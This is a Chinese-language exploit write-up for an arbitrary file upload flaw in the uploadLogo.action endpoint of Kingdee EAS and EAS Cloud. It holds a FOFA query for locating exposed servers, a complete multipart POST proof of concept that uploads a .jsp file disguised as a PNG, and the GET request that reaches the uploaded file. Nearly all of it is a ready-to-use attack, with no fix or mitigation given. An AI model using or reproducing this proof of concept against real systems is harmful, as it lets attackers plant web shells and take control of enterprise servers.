金蝶OA-EAS系统uploadLogo.action任意文件上传漏洞

金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞

金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件，旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。

fofa

app="Kingdee-EAS"

poc

POST /plt_portal/setting/uploadLogo.action HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Forwarded-For: 
Content-Length: 632
Content-Type: multipart/form-data; boundary=04844569c7ca7d21a3ca115dca477d62

--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="chooseLanguage_top"; filename="chooseLanguage_top"

ch
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="dataCenter"; filename="dataCenter"

xx
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="insId"; filename="insId"


--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="type"; filename="type"

top
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="upload"; filename="test.jsp"
Content-Type: image/png

test
--04844569c7ca7d21a3ca115dca477d62--

上传文件路径

GET /portal/res/file/upload/xxx.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Forwarded-For: